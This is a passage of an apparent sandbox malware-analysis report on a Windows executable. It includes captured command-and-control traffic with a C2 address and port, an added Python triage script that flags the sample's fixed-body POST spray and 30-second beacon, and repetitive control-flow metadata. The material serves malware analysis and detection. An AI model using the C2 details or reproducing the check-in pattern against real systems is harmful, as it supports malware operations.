                              Data Raw: 31 38 35 2e 31 35 37 2e 32 31 33 2e 32 35 33 3b 31 32 30 37 32 3b 68 65 61 58 74 54 34 34 74 64 4b 69 70 6d 5a 68 3a 55 31 4b 2f 5a 46 53 2f 42 35 35 34 57 43 6a 36 48 37 39 2e 70 6f 77 38 42 70 56 2e 68 51 72 32 70 62 45 33 41 62 4a 32 68 4b 44 2e 63 57 30 31 53 53 63 30 68 41 5a 36 6a 37 62 2c 4e 56 79 68 74 55 74 74 77 52 39 74 35 56 78 70 42 37 55 3a 51 4f 6f 2f 63 50 30 2f 76 6f 6e 34 30 72 68 36 35 69 6c 2e 5a 65 42 38 4a 33 57 2e 7a 65 33 32 52 72 36 33 43 66 72 36 61 77 45 2e 51 78 38 36 38 37 43 31 42 4a 4f 2c 58 4b 6b 68 49 38 5a 74 45 76 79 74 75 46 57 70 63 68 50 3a 32 6c 57 2f 77 76 6e 2f 5a 57 52 39 4d 46 7a 33 63 4c 4e 2e 59 4b 64 31 56 4e 4b 38 54 4e 64 35 61 78 75 2e 53 79 59 31 66 43 75 35 54 43 61 39 4e 5a 53 2e 38 44 33 32 71 78 71 35 43 46 53 33 56 6a 70 2c 4c 58 57 68 45 51 77 74 36 72 4a 74 6c 6b 56 70 52 46 4b 3a 76 4e 50 2f 35 77 52 2f 37 34 6e 39 66 4f 77 31 6f 6f 4b 2e 76 43 53 32 75 42 69 31 36 58 61 32 39 6d 6a 2e 73 42 70 31 31 78 76 36 52 51 47 36 69 55 53 2e 42 39 64 [TRUNCATED]
                              Data Ascii: 185.157.213.253;12072;heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7b,NVyhtUttwR9t5VxpB7U:QOo/cP0/von40rh65il.ZeB8J3W.ze32Rr63Cfr6awE.Qx8687C1BJO,XKkhI8ZtEvytuFWpchP:2lW/wvn/ZWR9MFz3cLN.YKd1VNK8TNd5axu.SyY1fCu5TCa9NZS.8D32qxq5CFS3Vjp,LXWhEQwt6rJtlkVpRFK:vNP/5wR/74n9fOw1ooK.vCS2uBi16Xa29mj.sBp11xv6RQG6iUS.B9d9TKh1aWa,pWVh5pktvPct8Orpm8C:CQc/GCy/hwW14yl8JZa8cmi.tLE13PZ30xO0TuR.Dd72mNq0Pv56WPp.eyb2Uji4Cx73zKb
                              Nov 10, 2024 16:49:21.090476990 CET | 6 | OUT | Data Raw: 00
                              Data Ascii:
                              Nov 10, 2024 16:49:51.095213890 CET | 6 | OUT | Data Raw: 00
                              Data Ascii:
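The sessions above show one fixed 198-byte body POSTed to five hosts in turn with a different 8-character X-Api-Key on every request, answered with 429 Too Many Requests until 188.130.206.243 returns a 200 OK whose body opens with an address and a port (185.157.213.253;12072); the client then keeps that session open and sends a single 0x00 byte roughly every 30 seconds. The following is an added example, not part of the Joe Sandbox report and not code from the sample: it re-creates the transcript from the values shown (the body is abbreviated, since only its digest matters) and runs three triage checks over it, grouping Go-http-client POSTs by body digest to flag the spray, splitting the 200 OK body into address, port and opaque entries (what the entries encode is not established by the report), and measuring the keepalive cadence from the report's own timestamps. All function names and the abbreviated body are the example's own.

```python
"""Triage helpers for the check-in traffic in the sessions above.
Added example, not part of the Joe Sandbox report and not code from the
sample. The transcript is constructed from values in the report (hosts,
X-Api-Key values, status codes, the 200 OK body); the 198-byte request
body is abbreviated because only its digest is used."""
import hashlib
import re
from collections import defaultdict
from datetime import datetime

# First bytes of the body that is identical in every session (constructed
# abbreviation of the 198-byte payload shown in the report).
BODY = bytes.fromhex("184d1b150c152a0b4c5c4b0316211a071a1329")

# (destination host, X-Api-Key, response status) for sessions 2 to 9.
SESSIONS = [
    ("93.185.159.253", "qp5sEuke", 429), ("91.212.166.91", "n9HFL5dt", 429),
    ("188.130.206.243", "5tsXyW0C", 429), ("46.8.232.106", "TM5rMihx", 429),
    ("46.8.236.61", "0oN7jWnU", 429), ("93.185.159.253", "fOauRxk0", 429),
    ("91.212.166.91", "RLinuieK", 429), ("188.130.206.243", "C4HDGxuS", 200),
]

# Body of the single 200 OK (session 9) as rendered in the report's ASCII
# column; only the first two comma-separated entries are reproduced.
CONFIG_200 = (
    "185.157.213.253;12072;"
    "heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7b,"
    "NVyhtUttwR9t5VxpB7U:QOo/cP0/von40rh65il.ZeB8J3W.ze32Rr63Cfr6awE.Qx8687C1BJO"
)

API_KEY_RE = re.compile(r"^[A-Za-z0-9]{8}$")

def build_request(host: str, api_key: str) -> bytes:
    """Re-create one client request with the header set the report shows."""
    head = (f"POST / HTTP/1.1\r\nHost: {host}\r\nUser-Agent: Go-http-client/1.1\r\n"
            f"Content-Length: 198\r\nX-Api-Key: {api_key}\r\nAccept-Encoding: gzip\r\n\r\n")
    return head.encode() + BODY

def parse_request(raw: bytes):
    """Minimal HTTP/1.1 request parser: (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def find_fixed_body_spray(raw_requests, min_hosts: int = 3) -> dict:
    """Flag one opaque body POSTed to >= min_hosts hosts under a rotating
    8-character key. Go-default-UA POSTs to / are grouped by body digest."""
    groups = defaultdict(lambda: {"hosts": set(), "keys": set()})
    for raw in raw_requests:
        method, path, hdr, body = parse_request(raw)
        if method != "POST" or path != "/":
            continue
        if not hdr.get("user-agent", "").startswith("Go-http-client/"):
            continue
        key = hdr.get("x-api-key", "")
        if not API_KEY_RE.match(key):
            continue
        digest = hashlib.sha256(body).hexdigest()
        groups[digest]["hosts"].add(hdr.get("host", ""))
        groups[digest]["keys"].add(key)
    return {d: g for d, g in groups.items() if len(g["hosts"]) >= min_hosts}

def parse_checkin_config(text: str) -> dict:
    """Split the 200 OK body as 'ip;port;entry,entry,...'. The first two
    fields are plainly an address and a port; what the remaining entries
    encode is not established by the report, so they are returned as-is."""
    ip, port, rest = text.strip().split(";", 2)
    return {"ip": ip, "port": int(port), "entries": rest.split(",")}

def keepalive_intervals(timestamps) -> list:
    """Seconds between consecutive frames on one session (beacon cadence).
    Report timestamps carry nanoseconds; datetime takes microseconds."""
    ts = [datetime.strptime(re.match(r"(.*\.\d{6})", t).group(1),
                            "%b %d, %Y %H:%M:%S.%f") for t in timestamps]
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]

def triage():
    """Run the three checks over the constructed transcript."""
    spray = find_fixed_body_spray([build_request(h, k) for h, k, _ in SESSIONS])
    cfg = parse_checkin_config(CONFIG_200)
    cadence = keepalive_intervals([  # 200 OK arrival, then the two 0x00 frames
        "Nov 10, 2024 16:48:51.090313911 CET",
        "Nov 10, 2024 16:49:21.090476990 CET",
        "Nov 10, 2024 16:49:51.095213890 CET",
    ])
    return spray, cfg, cadence

if __name__ == "__main__":
    spray, cfg, cadence = triage()
    for digest, g in spray.items():
        print(f"body {digest[:12]}: {len(g['hosts'])} hosts, {len(g['keys'])} keys")
    print(f"next hop {cfg['ip']}:{cfg['port']}; intervals {[round(i, 3) for i in cadence]}")
```

On the report's transcript the spray check yields one body digest sent to five hosts under eight keys, the config parser yields 185.157.213.253:12072, and both keepalive intervals come out within a few milliseconds of 30 s. The digest grouping is the part worth carrying into a real pipeline: the X-Api-Key rotates per request, so keying a rule on it fails, while the body and the Go default User-Agent are constant across every session.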



                              Target ID: 1
                              Start time: 10:48:08
                              Start date: 10/11/2024
                              Path: C:\Users\user\Desktop\Week11.exe.bin.exe
                              Wow64 process (32bit): true
                              Commandline: "C:\Users\user\Desktop\Week11.exe.bin.exe"
                              Imagebase: 0x400000
                              File size: 8'848'896 bytes
                              MD5 hash: 4FBC4F26E90324C3B535943452460761
                              Has elevated privileges: true
                              Has administrator privileges: true
                              Programmed in: C, C++ or other language
                              Reputation: low
                              Has exited: false


                                Execution Graph

                                Execution Coverage: 0.1%
                                Dynamic/Decrypted Code Coverage: 2.3%
                                Signature Coverage: 6.8%
                                Total number of Nodes: 44
                                Total number of Limit Nodes: 6

                                Execution graph (rendered as an interactive graph in the original report; only the API-bearing nodes are recoverable from the dump): NtQueryDefaultLocale at 0x415d89, 0x416050, 0x41667d, 0x416e88 and 0x41750e; VirtualProtect at 0x4074cd, 0x41ec4f and 0x42026d; VirtualAlloc at 0x41d836; ReadFile at 0x31fc670, far above the 0x400000 image base; nodes 0x41ee6c, 0x41ed8b, 0x41eed0 and 0x41ef1a each summarised as "15 API calls".
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$9HHF$L$L$L$L$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-3384230818
                                • Opcode ID: 68955427dbf68eb0547421ae42c10176993060677c0034ffc2d3f8c911572dd9
                                • Instruction ID: 0de00d26f1fb9f508684012c5907b879b538ff4cc18a3d4bb959296227bf3df1
                                • Opcode Fuzzy Hash: 68955427dbf68eb0547421ae42c10176993060677c0034ffc2d3f8c911572dd9
                                • Instruction Fuzzy Hash: B442F0B2D046A88BE7208B24DC44BEABB75EF81310F1440FED44D97682E67D5EC6CB56

                                Control-flow Graph

                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: e2ffb6181c023541538bd59b1230caad31e0c08fc34fb9f81d143e12f99e12f4
                                • Instruction ID: 08b73537eb7e8e6e88a36dc168ac67b40aac40a4c573c5969c336370d1323930
                                • Opcode Fuzzy Hash: e2ffb6181c023541538bd59b1230caad31e0c08fc34fb9f81d143e12f99e12f4
                                • Instruction Fuzzy Hash: 530223B1D092989EF7208A24DC84BEB7B75EF91304F0881FAD44D66281D27E5FC58F62

                                Control-flow Graph

                                Control-flow graph for the function at 0x405d31 (rendered interactively in the original report with an executed/not-executed legend; only the call targets are recoverable from the dump): blocks call 0x405df3, 0x405fcd, 0x406047, 0x406061, 0x406498, 0x406dc7, 0x406e2c, 0x408067, 0x40711e, 0x4066c8, 0x40694c, 0x4074b9, 0x40751b and 0x40758c; the block 0x406934-0x4074f9 calls VirtualProtect.
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 0c424b1fc99a087ce2db880a6f0d9f597395fc10eb7467f60121ca015e55ec16
                                • Instruction ID: bf0c5237c15ef48bcd96dc2977521d44ff8f2587dad0db81f896beb4dd51fd81
                                • Opcode Fuzzy Hash: 0c424b1fc99a087ce2db880a6f0d9f597395fc10eb7467f60121ca015e55ec16
                                • Instruction Fuzzy Hash: A602D3B1D086998AFB20CA24CC84BEB7BB5EF91304F1441FAD44DA6282D67D1FC58F56

                                Control-flow Graph

                                Control-flow graph for the function at 0x405df3, which the function at 0x405d31 calls from its block 0x405ddd-0x405df2 (rendered interactively in the original report with an executed/not-executed legend; only the call targets are recoverable from the dump): blocks call 0x405df3, 0x405fcd, 0x406047, 0x406061, 0x406498, 0x406dc7, 0x406e2c, 0x408067, 0x40711e, 0x4066c8, 0x40694c, 0x4074b9, 0x40751b and 0x40758c; the block 0x406934-0x4074f9 calls VirtualProtect.
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 322f25862a60c191500efcdc35d68742451c2e059e7fb2d1509d5f02938bf478
                                • Instruction ID: e9d56f7de48b27e66a140c9ab83341e1eeedbd670ca2fa2dd3d6c45633e1db51
                                • Opcode Fuzzy Hash: 322f25862a60c191500efcdc35d68742451c2e059e7fb2d1509d5f02938bf478
                                • Instruction Fuzzy Hash: BCF1D4B1D086998AF720CA24CC84BEB7B75EF92304F0441FAD44DA6682D67E1FC58F56

                                Control-flow Graph

                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: eb7622dd5255eba868280313c1bb5c852cb3ffeb95a4a3cdf3b67cf976482b23
                                • Instruction ID: 45ca8dbfdf14d572f5844f96886c6271579ef3de78a8368e969f3b09dc572996
                                • Opcode Fuzzy Hash: eb7622dd5255eba868280313c1bb5c852cb3ffeb95a4a3cdf3b67cf976482b23
                                • Instruction Fuzzy Hash: 24F1F3B1D086989EF7208A24DC84BEB7B75EF91304F0441FAD44DA6282D67D5FC58F62

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: b430d677837d89d4f9e3a9db6cb5c65cfd6384359e44a2bee124108e1d6cc75f
                                • Instruction ID: b79ffa20ab34d5cb6634e1a52c7b3afdc2bdf96a51776a287b2c37c807a6f03d
                                • Opcode Fuzzy Hash: b430d677837d89d4f9e3a9db6cb5c65cfd6384359e44a2bee124108e1d6cc75f
                                • Instruction Fuzzy Hash: F4E1F2B1D092989EF7208A24DC84BEBBB75EF91304F0441FAD44D66282D67E5FC58F62

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 4aeca380645f61cecc87b06a4fc475c62ba13c4de5e4a50eb893f9c8726b6cdc
                                • Instruction ID: 1d69f3a1e479d09448e965da535d8a52a3378ef0851e8ffb0b353f5724c677ca
                                • Opcode Fuzzy Hash: 4aeca380645f61cecc87b06a4fc475c62ba13c4de5e4a50eb893f9c8726b6cdc
                                • Instruction Fuzzy Hash: E0E1F3B1D092989EF7208A24DC84BEB7B75EF91304F0441FAD44D66282D67E1FC58F66

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 3f9aaad319541cb4f156a2e2904b4bc839c02407fc05a3112f3bb927a77e0b2c
                                • Instruction ID: 4ff2dfb957d96c90f15d76ef9a3cf5ca00bf787cc9faca43a72ce751b9e99cf4
                                • Opcode Fuzzy Hash: 3f9aaad319541cb4f156a2e2904b4bc839c02407fc05a3112f3bb927a77e0b2c
                                • Instruction Fuzzy Hash: 26E1E2B1D092989EF7208A24DC84BEBBB75EF91304F0441FAD44D66282D67E1FC58F66

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: fccf4c754a4bfd12344c3f771928471eb25d25576a74ef1b6d242388c3c116eb
                                • Instruction ID: 742f33448f4c103e6015b0d908c1e64736ba089dba9e13aa25fb16fa700a4926
                                • Opcode Fuzzy Hash: fccf4c754a4bfd12344c3f771928471eb25d25576a74ef1b6d242388c3c116eb
                                • Instruction Fuzzy Hash: 70E1E2B1D092989EF7208A24DC84BEBBB75EF91304F0441FAD44D66282D67E1FC58F66

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 3d2126126e218fe79e1625d8c6bf9eef1770de78b8e6f1eed8cfeb18f920a563
                                • Instruction ID: d55277f9546d1a84aac084c102d29f0f5530346181b0dece6d9dd37c447b40a3
                                • Opcode Fuzzy Hash: 3d2126126e218fe79e1625d8c6bf9eef1770de78b8e6f1eed8cfeb18f920a563
                                • Instruction Fuzzy Hash: 2ED1F5B1D082989EF720CA24DC44BEBBB75EF91304F0441FAD44DA6282D67E1FD58B66

                                Control-flow Graph

                                [control-flow graph image: entry block 405ece-405f18; the graph includes a call to VirtualProtect in block 406934-4074f9]
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 9b89c58e131aaa6c93aeedc91e8ae2000b0b64919f9d56cec03f1c6c7206eb3c
                                • Instruction ID: 26ec9bedaf6d3df76419a4bcffc395a901d8bbcc21cb015fd304402578a90765
                                • Opcode Fuzzy Hash: 9b89c58e131aaa6c93aeedc91e8ae2000b0b64919f9d56cec03f1c6c7206eb3c
                                • Instruction Fuzzy Hash: 4FE1D4A1D092998EF720CA24DC84BEB7B75EF91304F0441FAD44D66682D67E1FC58F62

                                Control-flow Graph

                                [control-flow graph image: entry block 405845-405fde; the graph includes a call to VirtualProtect in block 406934-4074f9]
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: bdc128cfa0736e7e7fbaf3617266de0173ff0f2d0559b16b46de260ff73863c8
                                • Instruction ID: b965cf8034f0f3c64d6398397f16d84dbfba2d492e66c82caf477a07806e27c0
                                • Opcode Fuzzy Hash: bdc128cfa0736e7e7fbaf3617266de0173ff0f2d0559b16b46de260ff73863c8
                                • Instruction Fuzzy Hash: 2DD1F6A1D093989EF720CA24DC84BEB7B75EF91304F0441FAD44DA6682D67E1FC58B62

                                Control-flow Graph

                                [control-flow graph image: entry block 405c29-405fde; the graph includes a call to VirtualProtect in block 406934-4074f9]
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: 3cdefca123af0d90453a608f58c0086b16cd8f7d2bc176c7e1a899f348f0179f
                                • Instruction ID: c3debf119573568fc0430f50f96b5e134cd5e479a97db9a0777a0a33d1310734
                                • Opcode Fuzzy Hash: 3cdefca123af0d90453a608f58c0086b16cd8f7d2bc176c7e1a899f348f0179f
                                • Instruction Fuzzy Hash: 1AD1B2B1D092989EF7208A24DC84BEB7B75EF91304F0441FAD48D66282D67E1FC58F66

                                Control-flow Graph

                                [control-flow graph image: entry block 405c7e-405fde; the graph includes a call to VirtualProtect in block 406934-4074f9]
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2457314740
                                • Opcode ID: e62e06c91d4d3097d52521295eba65512d7ea56d5a8524d22da75ba4df1c41a9
                                • Instruction ID: 696c6c4412a23ad9e12c94639e277d0de82a665899625c105bb19a87fe962e1d
                                • Opcode Fuzzy Hash: e62e06c91d4d3097d52521295eba65512d7ea56d5a8524d22da75ba4df1c41a9
